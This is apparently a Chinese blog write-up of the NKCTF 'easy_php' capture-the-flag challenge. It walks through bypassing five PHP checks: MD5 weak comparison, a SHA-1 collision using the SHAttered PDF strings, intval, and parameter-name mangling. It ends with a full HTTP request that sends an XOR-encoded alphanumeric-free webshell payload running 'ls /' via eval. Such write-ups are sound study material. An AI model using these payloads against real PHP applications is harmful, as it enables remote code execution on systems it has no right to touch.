NKCTF-easy_php

已于 2023-04-01 21:09:40 修改
阅读量2.5k 收藏 2
点赞数 1
文章标签: php 代码规范
于 2023-04-01 21:08:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/129902972
版权

源码:

<?php 
    highlight_file(__FILE__);
    error_reporting(0);
    if($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])){
        if((string)$_POST['c'] != (string)$_POST['d'] && sha1($_POST['c']) === sha1($_POST['d'])){
            if($_GET['e'] != 114514 && intval($_GET['e']) == 114514){
                if(isset($_GET['NS_CTF.go'])){
                    if(isset($_POST['cmd'])){
                        if(!preg_match('/[0-9a-zA-Z]/i', $_POST['cmd'])){
                            eval($_POST['cmd']);
                        }else{
                            die('error!!!!!!');
                        }
                    }else{
                        die('error!!!!!');
                    }
                }else{
                    die('error!!!!');
                }
            }else{
                die('error!!!');
            }
        }else{
            die('error!!');
        }
    }else{
        die('error!');
    }
?>

套娃题,需要绕五个过滤
if($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])){
第一个弱比较绕过,可以通过magic hash 0e开头或者数组绕过
**?a[]=1&b[]=2**
或者
**?a=s878926199a&b=s155964671a**
image.png
if((string)$_POST['c'] != (string)$_POST['d'] && sha1($_POST['c']) === sha1($_POST['d'])){
第二条件需要字符串类型,并且是强类型,所以不能用magic hash,找下sha1的强碰撞:

%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

image.png
if($_GET['e'] != 114514 && intval($_GET['e']) == 114514){
int转换,获取变量的整数值,直接传个小数:114514.5
image.png
if(isset($_GET['NS_CTF.go'])){
这个是考php非法传参问题
image.png
NS[CTF.go=1
image.png
if(!preg_match('/[0-9a-zA-Z]/i', $_POST['cmd'])){
无字母数字webshell,直接构造即可

POST /test2.php?a[]=1&b[]=2&e=114514.5&NS[CTF.go=1 HTTP/1.1
Host: 172.21.1.58
Content-Length: 1390
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.21.1.58
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.21.1.58/test2.php?a[]=1&b[]=2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&cmd=$_=(%a0%af%b0%ac%ab^%ff%ff%ff%ff%ff);$__=(%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff);$__($$_[_]);&_=ls /

在这里插入图片描述

keepb1ue
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
S7-1200_PLC_EASY_PLUS_V4.2
08-09
西门子S7-1200学习手册chm版本
S7-1200_PLC_EASY_PLUS 3.9新版
10-20
S7-1200_PLC_EASY_PLUS 3.9新版。技术参考CHM电子版。1200常用的知识点都在里面
CTF-easy_php
m0_62593857的博客
02-01 569
ctf-easy_php
[2021N1CTF国际赛]Easyphp-Wp
Y4tacker的博客
11-22 2897
文章目录写在前面Wp简单分析小实验验证猜想可效性构造tar参考文章 写在前面 在各种带飞的情况下,web被带ak了,这里比较想写一个easyphp的wp,这题到结束也只有14个解,其他的懒得写了,本文也只是简单分析 Wp 简单分析 看看首页源码 再看这里很明显是触发phar反序列化 如何插入数据是一个问题,这里没有上传,再看log.php 关键部分源码是这个,我们就应该去想如何去构造,这里phar太难搞了,具体可以看看官方文档关于他的结构,后面最后四位肯定是GBMB多一位都不行,这里想到了tar,本来
buuctf easyphp
qq_50613938的博客
12-16 492
我们用这个输出 但我不明白为什么,不能直接把“POST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"GET",然后配合_POST[‘a’];” 全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"_GET",然后配合P​OST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替".
CTF-江苏工匠杯easyphp 题解
百彦子烨的博客
11-04 4024
攻防世界-web新手区-江苏工匠杯-easyphp 题解
[第二届BMZCTF]easy_php
as you know, nlp is fantasitc!
01-17 468
[第二届BMZCTF]easy_php 写在前面的话:元旦打的比赛,现在终于有时间来复现,害,勤能补拙吧! 题目源码 <?php highlight_file(__FILE__); error_reporting(0); function new_addslashes($string) { if(!is_array($string)) return addslashes($string); foreach($string as $key => $val) $string[
Wi-Fi_CERTIFIED_Easy_Connect_Technology_Overview_202012
05-30
Wi-Fi CERTIFIED Easy Connect™ Technology Overview Wi-Fi CERTIFIED Easy Connect™是一种旨在简化Wi-Fi设备联网过程的技术,旨在解决智能家居和物联网(IoT)设备联网时的难题。该技术由Wi-Fi Alliance推出,...
Multi-AP_Specification_v2.0-easy mesh.pdf
03-10
Multi-AP_Specification_v2.0 easy mesh Multi-AP标准
cpu-z-portable-1-93_CPU-Z_easy_
09-29
它的便携版本,如 "cpu-z-portable-1-93_CPU-Z_easy_",使得用户无需安装即可直接运行,非常适合在不同电脑上快速了解硬件配置。"easy" 的标签表明这款软件设计简洁,操作简便,即使是计算机新手也能轻松掌握。 CPU...
[GYCTF2020]Easyphp
东隅的博客
10-31 740
nickname),那这个类它反序列化出来字符串大括号{}里面只有俩元素,一个age的键值对一个nickname的键值对(这么说也不太严谨,就是那个意思吧),然后操作空间就来了,紧接着这个反序列化好的字符串进到safe函数里进行一个反序列化字符串的逃逸,nickname可以很长,union被替换成hacker等方式都可以用来进行逃逸。这个是放在Info类的nickname里作为字符串出现的,为了保证Info类序列化的可用性,我们需要把这些字符串逃逸到Info类的第三个属性$CtrlCase里。
攻防世界ctf web easyphp题解wp
qq_41169485的博客
09-28 3724
第二步,用php代码编写MD5碰撞脚本得到b=53724。第五步,绕过array_search函数。第一步,用科学计数法绕过 a=1e9。第三步,绕过is_numeric函数。第四步,绕过is_array函数。一定要对传值url编码。
二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 2250
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
BUUCTF:[ISITDTU 2019]EasyPHP
末初的CSDN博客
04-27 4352
题目地址:BUUCTF:[ISITDTU 2019]EasyPHP Refer: https://tiaonmmn.github.io/2019/07/18/ISITDTU-Easy-PHP/ 思路很简单,绕过这两个if即可任意代码执行 先看一下第一个正则匹配 看不懂的推荐使用这个网站:https://regex101.com/ if ( preg_match('/[\x00- 0-9\'"...
[GYCTF2020]Easyphp php反序列化字符串逃逸+sql
scrawman的博客
12-04 3811
[GYCTF2020]Easyphp www.zip找到源代码,重点应该在lib.php和update.php function safe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter"); return str_replace($array,'hacker',$parm); } public function update(){
n1 php,从N1CTF easy_php学到的几个骚操作
weixin_34337134的博客
03-12 302
认真的拜读了师傅们关于N1CTF的各种writeup,收获了不少骚操作,记录下以备查找。反序列化点SoapClient php自带类的利用#使用的是SoapClient这个php自带类# 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求$a = new SoapClient(null, array('location'=> "xxx.xxx.xxx.xxx:80...
攻防世界web新手区easyphp题解writeup
weixin_46906325的博客
10-03 7235
攻防世界web新手区easyphp题解
php-MD5()函数漏洞
qq_42250840的博客
02-26 501
一、数字与字符串之间的比较 var_dump( 0 == "a" ); true var_dump( "0" == "a" );false php把字母开头的字符串转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前的数字。 二、MD5函数漏洞 $_GET['name'] != $_GET['password'] MD5($_GET['name']) == MD5($_...
s7-1200_plc_easy_plusv4.6
最新发布
11-15
s7-1200_plc_easy_plusv4.6是西门子推出的一款简易易用的PLC编程软件,它能够与S7-1200系列PLC进行无缝集成,帮助用户轻松快速地进行工业自动化控制系统的编程和调试。该软件具有直观的界面和丰富的功能模块,使得初学者和专业工程师都能够轻松上手并高效完成工作任务。 s7-1200_plc_easy_plusv4.6具有强大的在线监视和调试功能,用户可以通过实时监控PLC的运行状态和变量数值,快速定位和修复程序中的问题。同时,该软件还支持多种编程语言,包括梯形图和结构化文本,用户可以根据自己的习惯和需求选择合适的编程方式。 除此之外,s7-1200_plc_easy_plusv4.6还提供了丰富的资源库和示例程序,用户可以快速找到所需的函数块和程序模板,以加快开发进度和降低错误风险。另外,该软件还支持与其他西门子自动化设备的无缝集成,如触摸屏、传感器和执行器等,为用户提供了更为便利的编程和控制体验。 综合来说,s7-1200_plc_easy_plusv4.6是一款功能丰富、操作简便的PLC编程软件,适用于各种规模的工业自动化项目,能够帮助用户提高生产效率、降低成本、提升产品质量。希望通过这款软件,用户能够更轻松地实现他们的自动化控制任务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值